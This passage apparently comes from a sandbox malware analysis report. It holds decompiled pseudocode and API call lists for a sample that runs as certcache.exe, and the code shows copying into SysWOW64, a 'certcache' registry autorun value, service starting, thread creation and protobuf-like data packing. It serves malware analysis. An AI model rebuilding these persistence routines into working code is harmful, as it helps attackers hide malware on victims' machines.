    																							 *(_t2870 - 0xac) =  *( *(_t2870 - 4)) & 0x000000ff;
    																							 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																							goto L564;
    																						} else {
    																							L554:
    																							_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																							if(_t1692 == 0) {
    																								 *(_t2870 - 0xac) = 0;
    																								L562:
    																								L564:
    																								if(0 != 0) {
    																									goto L553;
    																								} else {
    																									 *(_t2870 - 0xc) =  *(_t2870 - 0xac) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																									 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																									if( *(_t2870 - 8) < 8) {
    																										goto L553;
    																									} else {
    																										goto L566;
    																									}
    																								}
    																							} else {
    																								L555:
    																								 *(_t2870 - 0x1c) = 1;
    																								_t2086 =  *(_t2870 + 8);
    																								 *_t2086 = 0x29;
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	} else {
    																		L534:
    																		_t1692 =  *(_t2870 - 4);
    																		if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																			 *(_t2870 - 0xa8) =  *( *(_t2870 - 4)) & 0x000000ff;
    																			 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																			goto L545;
    																		} else {
    																			L535:
    																			_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																			if(_t2086 == 0) {
    																				 *(_t2870 - 0xa8) = 0;
    																				L543:
    																				L545:
    																				if(0 != 0) {
    																					goto L534;
    																				} else {
    																					 *(_t2870 - 0xc) =  *(_t2870 - 0xa8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																					 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																					if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
    																						goto L534;
    																					} else {
    																						goto L547;
    																					}
    																				}
    																			} else {
    																				L536:
    																				 *(_t2870 - 0x1c) = 1;
    																				_t2465 =  *(_t2870 + 8);
    																				 *_t2465 = 0x20;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												} else {
    													goto L352;
    												}
    											}
    										} else {
    											goto L503;
    										}
    									} else {
    										goto L504;
    									}
    								}
    								goto L600;
    							case 0x21:
    								goto L584;
    						}
    					}
    					L600:
    					goto 0x140d42;
    					asm("int3");
    					 *(_t2465 + 4) = _t1692;
    					goto L601;
    				}
    				L622:
    				return _t1688;
    			}









    0x00133601
    0x00133608
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00133608
    0x00133582
    0x00133582
    0x00133582
    0x00133589
    0x0013358c
    0x0013358c
    0x00133580
    0x00133578
    0x0013356c
    0x00133530
    0x00133530
    0x00133530
    0x00133537
    0x0013353a
    0x0013353a
    0x0013335b
    0x0013335f
    0x0013343f
    0x0013343f
    0x00133445
    0x001334b1
    0x001334bd
    0x00000000
    0x00133447
    0x00133447
    0x0013344a
    0x0013344d
    0x00133499
    0x001334a4
    0x001334c0
    0x001334c2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0013344f
    0x0013344f
    0x0013344f
    0x00133456
    0x00133459
    0x00133459
    0x0013344d
    0x00133365
    0x00133365
    0x00133369
    0x0013340b
    0x0013341a
    0x00133426
    0x0013342f
    0x00133434
    0x00000000
    0x0013343a
    0x001334c8
    0x0013334b
    0x0013334e
    0x00000000
    0x0013334e
    0x0013336f
    0x0013336f
    0x0013336f
    0x00133375
    0x001333d4
    0x001333e0
    0x00000000
    0x00133377
    0x00133377
    0x0013337a
    0x0013337d
    0x001333be
    0x001333cc
    0x001333e3
    0x001333e5
    0x00000000
    0x001333e7
    0x001333f5
    0x001333fe
    0x00133405
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00133405
    0x0013337f
    0x0013337f
    0x0013337f
    0x00133386
    0x00133389
    0x00133389
    0x0013337d
    0x00133375
    0x00133369
    0x0013335f
    0x00133355
    0x0013327a
    0x0013327a
    0x0013327a
    0x00133280
    0x001332df
    0x001332eb
    0x00000000
    0x00133282
    0x00133282
    0x00133285
    0x00133288
    0x001332c9
    0x001332d7
    0x001332ee
    0x001332f0
    0x00000000
    0x001332f2
    0x00133300
    0x00133309
    0x00133315
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00133315
    0x0013328a
    0x0013328a
    0x0013328a
    0x00133291
    0x00133294
    0x00133294
    0x00133288
    0x00133280
    0x00133274
    0x00133265
    0x0013318e
    0x0013318e
    0x0013318e
    0x00133194
    0x001331f3
    0x001331ff
    0x00000000
    0x00133196
    0x00133196
    0x00133199
    0x0013319c
    0x001331dd
    0x001331eb
    0x00133202
    0x00133204
    0x00000000
    0x00133206
    0x00133214
    0x0013321d
    0x00133224
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00133224
    0x0013319e
    0x0013319e
    0x0013319e
    0x001331a5
    0x001331a8
    0x001331a8
    0x0013319c
    0x00133194
    0x00134fea
    0x00134fed
    0x00134ff0
    0x00135253
    0x00135253
    0x0013525a
    0x0013525d
    0x00134ff6
    0x00134ff6
    0x00134fff
    0x001350a6
    0x001350b1
    0x001350b7
    0x001350bf
    0x001350c2
    0x001350c4
    0x00000000
    0x001350ca
    0x001350ca
    0x001350dc
    0x001350e0
    0x00000000
    0x001350e6
    0x001350ea
    0x001351c1
    0x001351c1
    0x001351c7
    0x00135226
    0x00135232
    0x00000000
    0x001351c9
    0x001351c9
    0x001351cc
    0x001351cf
    0x00135210
    0x0013521e
    0x00135235
    0x00135237
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001351d1
    0x001351d1
    0x001351d1
    0x001351d8
    0x001351db
    0x00135275
    0x001351cf
    0x001350f0
    0x001350f0
    0x001350f4
    0x00135196
    0x0013519f
    0x001351ab
    0x001351b4
    0x001351b9
    0x00000000
    0x001351bf
    0x00135239
    0x00135242
    0x0013524b
    0x001350d6
    0x001350d9
    0x00000000
    0x001350d9
    0x001350fa
    0x001350fa
    0x001350fa
    0x00135100
    0x0013515f
    0x0013516b
    0x00000000
    0x00135102
    0x00135102
    0x00135105
    0x00135108
    0x00135149
    0x00135157
    0x0013516e
    0x00135170
    0x00000000
    0x00135172
    0x00135180
    0x00135189
    0x00135190
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00135190
    0x0013510a
    0x0013510a
    0x0013510a
    0x00135111
    0x00135114
    0x00135277
    0x00135108
    0x00135100
    0x001350f4
    0x001350ea
    0x001350e0
    0x00135005
    0x00135005
    0x00135005
    0x0013500b
    0x0013506a
    0x00135076
    0x00000000
    0x0013500d
    0x0013500d
    0x00135010
    0x00135013
    0x00135054
    0x00135062
    0x00135079
    0x0013507b
    0x00000000
    0x0013507d
    0x0013508b
    0x00135094
    0x001350a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001350a0
    0x00135015
    0x00135015
    0x00135015
    0x0013501c
    0x0013501f
    0x00135279
    0x00135013
    0x0013500b
    0x00134fff
    0x00134ff0
    0x00134fe4
    0x001348e8
    0x00000000
    0x00000000
    0x00000000
    0x00134477
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00134de4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00132f58
    0x00135291
    0x00135291
    0x00135296
    0x00135297
    0x00000000
    0x00135297
    0x00135521
    0x00135525

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 56%
    			E0013A658() {
    				void* _t22;
    				void* _t24;
    				void* _t26;
    
    				WriteFile();
    				CloseHandle(_t24);
    				memset(_t26 - 0x5c, 0, 0x44);
    				 *(_t26 - 0x5c) = 0x44;
    				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
    					CloseHandle( *(_t26 - 0x18));
    					_push( *((intOrPtr*)(_t26 - 0x14)));
    					CloseHandle();
    				}
    				HeapFree(GetProcessHeap(), 0, _t22);
    				return 0;
    			}







    APIs
    • WriteFile.KERNEL32 ref: 0013A658
    • CloseHandle.KERNEL32 ref: 0013A65F
    • memset.NTDLL ref: 0013A66D
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0013A69A
    • CloseHandle.KERNEL32(?), ref: 0013A6A7
    • CloseHandle.KERNEL32(?), ref: 0013A6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
    • HeapFree.KERNEL32(00000000), ref: 0013A6C0
    C-Code - Quality: 100%
    			E0013A6E0(void* __ecx) {
    				void* _t15;
    				void* _t22;
    				void _t25;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				void* _t33;
    
    				_t31 = __ecx;
    				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
    				_t33 = _t15;
    				if(_t33 == 0) {
    					return _t15;
    				} else {
    					 *_t33 =  *_t31;
    					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
    					_t4 = _t33 + 0x10; // 0x10
    					_t29 = _t4;
    					 *(_t33 + 8) = _t29;
    					 *(_t33 + 0xc) =  *(_t31 + 0xc);
    					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
    					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t32 == 0) {
    						L5:
    						return HeapFree(GetProcessHeap(), 0, _t33);
    					}
    					 *(_t32 + 4) =  *_t33;
    					_t22 = CreateThread(0, 0, 0x13a3f0, _t33, 0, 0);
    					 *(_t32 + 8) = _t22;
    					if(_t22 == 0) {
    						HeapFree(GetProcessHeap(), 0, _t32);
    						goto L5;
    					}
    					_t25 =  *0x13cbd4; // 0x0
    					 *_t32 = _t25;
    					 *0x13cbd4 = _t32;
    					return _t25;
    				}
    			}











    APIs
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0013A6ED
    • RtlAllocateHeap.NTDLL(00000000), ref: 0013A6F4
    • memcpy.NTDLL(00000010,?,?), ref: 0013A721
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0013A72E
    • RtlAllocateHeap.NTDLL(00000000), ref: 0013A735
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 0013A754
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013A774
    • HeapFree.KERNEL32(00000000), ref: 0013A77B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013A784
    • HeapFree.KERNEL32(00000000), ref: 0013A78B
    C-Code - Quality: 26%
    			E0013A515(void* __edi, void* __eflags) {
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t37;
    
    				_t32 = __edi;
    				WriteFile(??, ??, ??, ??, ??);
    				CloseHandle(_t34);
    				L00131830(0x131398, 4);
    				_t35 =  *(_t37 - 4);
    				 *0x13c20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
    				HeapFree(GetProcessHeap(), 0, _t35);
    				_push(_t37 - 0x18);
    				_push( *((intOrPtr*)(_t37 + 8)));
    				if(L001321B0(_t37 - 0x528, _t32) != 0) {
    					CloseHandle( *(_t37 - 0x18));
    					CloseHandle( *(_t37 - 0x14));
    				}
    				_push( *((intOrPtr*)(_t37 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t32);
    				return 0;
    			}








    C-Code - Quality: 45%
    			E001316D3() {
    				void* __edi;
    				void* __esi;
    				int _t12;
    				void* _t13;
    
    				memset();
    				 *(_t13 - 0x58) = 0x44;
    				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
    				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14);
    				if(_t12 == 0) {
    					goto 0x140044;
    					asm("int3");
    					asm("int3");
    					return _t12;
    				} else {
    					WaitForSingleObject(__esi, 0xffffffff);
    					CloseHandle( *(__ebp - 0x14));
    					CloseHandle( *(__ebp - 0x10));
    					CloseHandle(__esi);
    					CloseHandle(__edi);
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebp);
    					return 1;
    				}
    			}








    APIs
    • memset.NTDLL ref: 001316D3
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00131707
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00131714
    • CloseHandle.KERNEL32(?), ref: 0013171D
    • CloseHandle.KERNEL32(?), ref: 00131726
    • CloseHandle.KERNEL32 ref: 0013172D
    • CloseHandle.KERNEL32 ref: 00131734
    APIs
    • WTSGetActiveConsoleSessionId.KERNEL32 ref: 0013A420
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0013A5B5
    • GetTickCount.KERNEL32 ref: 0013A5BB
    • _snwprintf.NTDLL ref: 0013A60E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0013A61A
    • HeapFree.KERNEL32(00000000), ref: 0013A621
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0013A640
    • GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
    • HeapFree.KERNEL32(00000000), ref: 0013A6C0
    C-Code - Quality: 26%
    			E0013A46E(void* __edi, void* __eflags) {
    				signed int _t22;
    				void* _t28;
    				void* _t59;
    				void* _t63;
    				void* _t64;
    				void* _t66;
    				void* _t67;
    
    				_t59 = __edi;
    				 *0x13c214();
    				_t22 = GetTickCount();
    				_t2 = (_t22 & 0x00000007) + 1; // 0x1
    				L00132270(_t67 - 0x98, _t2);
    				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
    				L00131830(0x1315a4, 0xc);
    				_t63 =  *(_t67 - 4);
    				_t28 = _t67 - 0x320;
    				 *0x13c20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t64 != 0xffffffff) {
    					goto 0x141e83;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					WriteFile();
    					CloseHandle(_t64);
    					L00131830(0x131398, 4);
    					_t66 =  *(_t67 - 4);
    					 *0x13c20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
    					HeapFree(GetProcessHeap(), 0, _t66);
    					_push(_t67 - 0x18);
    					_push( *((intOrPtr*)(_t67 + 8)));
    					if(L001321B0(_t67 - 0x528, _t59) != 0) {
    						CloseHandle( *(_t67 - 0x18));
    						CloseHandle( *(_t67 - 0x14));
    					}
    				}
    				_push( *((intOrPtr*)(_t67 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t59);
    				return 0;
    			}











    APIs
    • SHGetFolderPathW.SHELL32 ref: 0013A46E
    • GetTickCount.KERNEL32 ref: 0013A474
    • _snwprintf.NTDLL ref: 0013A4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0013A4D3
    • HeapFree.KERNEL32(00000000), ref: 0013A4DA
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0013A4F9
    • CloseHandle.KERNEL32(?), ref: 0013A6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
    • HeapFree.KERNEL32(00000000), ref: 0013A6C0
    APIs
    Strings
    • C:\Windows\SysWOW64\certcache.exe, xrefs: 001396DE
    • C:\Windows\SysWOW64\certcache.exe, xrefs: 001396D0
    APIs
    • GetTempPathW.KERNEL32 ref: 00139705
    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00139717
    • SHFileOperationW.SHELL32(?), ref: 00139738
    • SHFileOperationW.SHELL32(?), ref: 00139764
    C-Code - Quality: 25%
    			E00139990() {
    				int _t10;
    				void* _t12;
    
    				memset();
    				 *(_t12 - 0x88) = 0x44;
    				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
    				_t10 = CreateProcessW("C:\Windows\SysWOW64\certcache.exe", 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
    				if(_t10 != 0) {
    					CloseHandle( *(_t12 - 0x30));
    					_t10 = CloseHandle( *(_t12 - 0x2c));
    				}
    				goto 0x141bae;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				return _t10;
    			}






    APIs
    • memset.NTDLL ref: 00139990
    • CreateProcessW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001399C8
    • CloseHandle.KERNEL32(?), ref: 001399D5
    • CloseHandle.KERNEL32(?), ref: 001399DE
    C-Code - Quality: 100%
    			E0013A037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
    				unsigned int _t31;
    				unsigned int _t32;
    				long _t41;
    				signed char _t52;
    				signed char _t54;
    				signed char _t56;
    				signed char _t58;
    				signed char _t60;
    				void* _t62;
    				intOrPtr* _t63;
    				int _t65;
    				int _t66;
    				int _t67;
    				void* _t68;
    				signed char _t69;
    				signed char _t71;
    				signed char _t73;
    				signed char _t75;
    				signed char _t77;
    				void* _t79;
    				void* _t80;
    				void* _t81;
    				void* _t82;
    				int _t83;
    				signed char* _t84;
    				void* _t86;
    				char* _t89;
    				signed char* _t91;
    				signed char* _t92;
    				void* _t93;
    				char* _t94;
    				signed char* _t95;
    				void* _t96;
    				char* _t97;
    				signed char* _t98;
    				void* _t99;
    				char* _t100;
    				signed char* _t101;
    				void* _t103;
    
    				_t84 = __edi;
    				_t79 = __edx;
    				_t68 = __ecx;
    				_t62 = __ebx;
    				_t31 = __eax;
    				if(__eax > 0x7f) {
    					do {
    						_t31 = _t31 >> 7;
    						_t62 = _t62 + 1;
    					} while (_t31 > 0x7f);
    				}
    				_t32 = _t84[0x28];
    				 *((intOrPtr*)(_t103 - 4)) = 1;
    				while(_t32 > 0x7f) {
    					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
    					_t32 = _t32 >> 7;
    				}
    				_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
    				 *(_t63 + 4) = _t41;
    				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
    				 *_t63 = _t89;
    				if(_t89 != 0) {
    					 *_t89 = 8;
    					_t91 = _t89 + 1;
    					_t69 =  *_t84;
    					while(_t69 > 0x7f) {
    						_t60 = _t69;
    						_t69 = _t69 >> 7;
    						 *_t91 = _t60 | 0x00000080;
    						_t91 =  &(_t91[1]);
    					}
    					 *_t91 = _t69 & 0x0000007f;
    					_t91[1] = 0x12;
    					_t92 =  &(_t91[2]);
    					_t65 = _t84[8];
    					_t71 = _t65;
    					_t80 = _t84[4];
    					if(_t65 > 0x7f) {
    						do {
    							_t58 = _t71;
    							_t71 = _t71 >> 7;
    							 *_t92 = _t58 | 0x00000080;
    							_t92 =  &(_t92[1]);
    						} while (_t71 > 0x7f);
    					}
    					 *_t92 = _t71 & 0x0000007f;
    					_t93 =  &(_t92[1]);
    					memcpy(_t93, _t80, _t65);
    					_t94 = _t93 + _t65;
    					 *_t94 = 0x1d;
    					 *(_t94 + 1) = _t84[0xc];
    					 *((char*)(_t94 + 5)) = 0x25;
    					 *(_t94 + 6) = _t84[0x10];
    					 *((char*)(_t94 + 0xa)) = 0x2a;
    					_t95 = _t94 + 0xb;
    					_t66 = _t84[0x18];
    					_t73 = _t66;
    					_t81 = _t84[0x14];
    					if(_t66 > 0x7f) {
    						do {
    							_t56 = _t73;
    							_t73 = _t73 >> 7;
    							 *_t95 = _t56 | 0x00000080;
    							_t95 =  &(_t95[1]);
    						} while (_t73 > 0x7f);
    					}
    					 *_t95 = _t73 & 0x0000007f;
    					_t96 =  &(_t95[1]);
    					memcpy(_t96, _t81, _t66);
    					_t97 = _t96 + _t66;
    					 *_t97 = 0x32;
    					_t98 = _t97 + 1;
    					_t67 = _t84[0x20];
    					_t75 = _t67;
    					_t82 = _t84[0x1c];
    					if(_t67 > 0x7f) {
    						do {
    							_t54 = _t75;
    							_t75 = _t75 >> 7;
    							 *_t98 = _t54 | 0x00000080;
    							_t98 =  &(_t98[1]);
    						} while (_t75 > 0x7f);
    					}
    					 *_t98 = _t75 & 0x0000007f;
    					_t99 =  &(_t98[1]);
    					memcpy(_t99, _t82, _t67);
    					_t100 = _t99 + _t67;
    					 *_t100 = 0x3a;
    					_t101 = _t100 + 1;
    					_t83 = _t84[0x28];
    					_t77 = _t83;
    					_t86 = _t84[0x24];
    					if(_t83 > 0x7f) {
    						do {
    							_t52 = _t77;
    							_t77 = _t77 >> 7;
    							 *_t101 = _t52 | 0x00000080;
    							_t101 =  &(_t101[1]);
    						} while (_t77 > 0x7f);
    					}
    					 *_t101 = _t77 & 0x0000007f;
    					memcpy( &(_t101[1]), _t86, _t83);
    					_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				}
    				return 0 |  *_t63 != 0x00000000;
    			}











































    APIs
    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 0013A091
    • RtlAllocateHeap.NTDLL(00000000), ref: 0013A098
    • memcpy.NTDLL(00000000,00000001,?), ref: 0013A0F8
    • memcpy.NTDLL(-0000000A,?,?), ref: 0013A148
    • memcpy.NTDLL(-00000008,?,?), ref: 0013A17C
    • memcpy.NTDLL(-00000006,?,?), ref: 0013A1B0
    C-Code - Quality: 39%
    			E0013198B() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t15;
    
    				asm("lahf");
    				asm("int3");
    				L00131830(_t11, _t12);
    				_t13 =  *(_t15 - 4);
    				 *0x13c20c(_t15 - 0x20c, 0x104, _t13, "C:\Windows\SysWOW64\certcache.exe", _t13);
    				HeapFree(GetProcessHeap(), 0, _t13);
    				return DeleteFileW(_t15 - 0x20c);
    			}








    APIs
    • _snwprintf.NTDLL ref: 001319A8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001319B4
    • HeapFree.KERNEL32(00000000), ref: 001319BB
    • DeleteFileW.KERNEL32(?), ref: 001319C8
    Strings
    • C:\Windows\SysWOW64\certcache.exe, xrefs: 0013199C
    C-Code - Quality: 27%
    			E0013992A() {
    				void* _t11;
    				void* _t13;
    				void* _t15;
    				void* _t17;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				if( *((intOrPtr*)(_t17 - 8)) != 0) {
    					 *0x13c088(_t15, 1, _t11);
    					HeapFree(GetProcessHeap(), 0, _t11);
    				}
    				if(_t15 != 0) {
    					StartServiceW();
    					CloseServiceHandle(_t15);
    				}
    				CloseServiceHandle(_t13);
    				return 1;
    			}








    APIs
    • GetProcessHeap.KERNEL32 ref: 0013992A
    • HeapFree.KERNEL32(00000000), ref: 00139931
    • ChangeServiceConfig2W.ADVAPI32(?,00000001), ref: 00139941
    • GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 0013994A
    • HeapFree.KERNEL32(00000000), ref: 00139951
    • CloseServiceHandle.ADVAPI32 ref: 0013996E
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 56%
    			E00139A53(signed int __ebx, void* __eflags) {
    				int _t14;
    				signed int _t19;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    
    				_t19 = __ebx;
    				asm("lahf");
    				asm("int3");
    				L00131830(_t21, _t22);
    				if(RegCreateKeyExW(0x80000001,  *(_t23 - 4), 0, 0, 0, 2, 0, _t23 - 0xc, 0) == 0) {
    					RegSetValueExW( *(_t23 - 0xc), "certcache", 0, 1, _t23 - 0x214, 2 + _t19 * 2);
    					RegCloseKey( *(_t23 - 0xc));
    				}
    				HeapFree(GetProcessHeap(), ??, ??);
    				_t14 = HeapFree(GetProcessHeap(), ??, ??);
    				goto 0x141c47;
    				return _t14;
    			}









    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00139A75
    • RegSetValueExW.ADVAPI32(00000000,certcache,00000000,00000001,?,00000000), ref: 00139A9A
    • RegCloseKey.ADVAPI32(?), ref: 00139AA3
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 35%
    			E00138A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
    				void* _t19;
    				intOrPtr _t20;
    				signed char _t25;
    				void* _t27;
    				intOrPtr _t31;
    				void* _t32;
    				void _t34;
    				signed char _t35;
    				signed char _t38;
    				signed int _t43;
    				intOrPtr _t46;
    				signed char _t47;
    				void* _t48;
    
    				L0:
    				while(1) {
    					L0:
    					_t47 = __esi;
    					_t45 = __edi;
    					_t20 = L00131F70(_t19, __ecx, __edx);
    					 *((intOrPtr*)(__edi + 8)) = _t20;
    					if(_t20 == 0) {
    						goto L17;
    					}
    					L11:
    					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    					 *((intOrPtr*)(__edi + 0xc)) = _t31;
    					if(_t31 == 0) {
    						L15:
    						goto 0x1417a5;
    						asm("int3");
    						asm("int3");
    						_push( *((intOrPtr*)(_t45 + 8)));
    						L16:
    						asm("adc eax, 0x13c178");
    						goto L17;
    					} else {
    						L12:
    						goto 0x141789;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						L13:
    						asm("lahf");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						_t32 = CreateThread(??, ??, ??, ??, ??, ??);
    						 *(__edi + 0x10) = _t32;
    						if(_t32 == 0) {
    							goto L15;
    						} else {
    							L14:
    							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
    							_t34 =  *0x13c274; // 0x0
    							 *__edi = _t34;
    							 *0x13c274 = __edi;
    							do {
    								L1:
    								_t46 =  *((intOrPtr*)(_t48 - 4));
    								L2:
    								_t43 = 0;
    								_t38 = 0;
    								 *(_t48 - 8) = 0;
    								_t35 = 0x80;
    								if(_t47 < _t46) {
    									while(1) {
    										L3:
    										_t35 =  *_t47;
    										_t47 = _t47 + 1;
    										_t43 = _t43 | (_t35 & 0x7f) << _t38;
    										if(_t35 >= 0) {
    											break;
    										}
    										L4:
    										_t38 = _t38 + 7;
    										if(_t47 < _t46) {
    											continue;
    										}
    										break;
    									}
    									L5:
    									 *(_t48 - 8) = _t43;
    								}
    								L6:
    								_t25 =  !((_t35 & 0x000000ff) >> 7);
    								if((_t25 & 0x00000001) != 0) {
    									L7:
    									_t25 = _t43 + _t47;
    									if(_t25 <= _t46) {
    										L8:
    										 *(_t48 - 0xc) = _t47;
    										_t47 = _t25;
    										_t25 = L00138800(_t48 - 0xc, _t48 - 0x18);
    										if(_t25 != 0) {
    											goto L9;
    										}
    									}
    								}
    								L18:
    								goto 0x1417ba;
    								asm("int3");
    								return _t25;
    								L9:
    								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    								_t45 = _t27;
    							} while (_t27 == 0);
    							goto 0x141775;
    							asm("int3");
    							continue;
    						}
    					}
    					L19:
    					L17:
    					HeapFree(GetProcessHeap(), 0, _t45);
    					goto L1;
    				}
    			}

















    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00138A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 00138A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 00138ABE
    • HeapFree.KERNEL32(00000000), ref: 00138AC5
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 43%
    			E00138AB4(void* __ebx, void* __edi, signed char __esi) {
    				signed char _t21;
    				intOrPtr _t27;
    				intOrPtr _t30;
    				void* _t31;
    				void _t33;
    				signed char _t36;
    				signed char _t37;
    				signed int _t41;
    				intOrPtr _t44;
    				void* _t45;
    				signed char _t46;
    				void* _t47;
    
    				L0:
    				while(1) {
    					L0:
    					_t46 = __esi;
